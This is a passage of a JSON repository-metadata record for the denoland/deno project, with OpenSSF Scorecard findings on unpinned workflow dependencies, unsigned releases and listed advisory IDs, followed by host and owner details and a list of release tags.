does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosy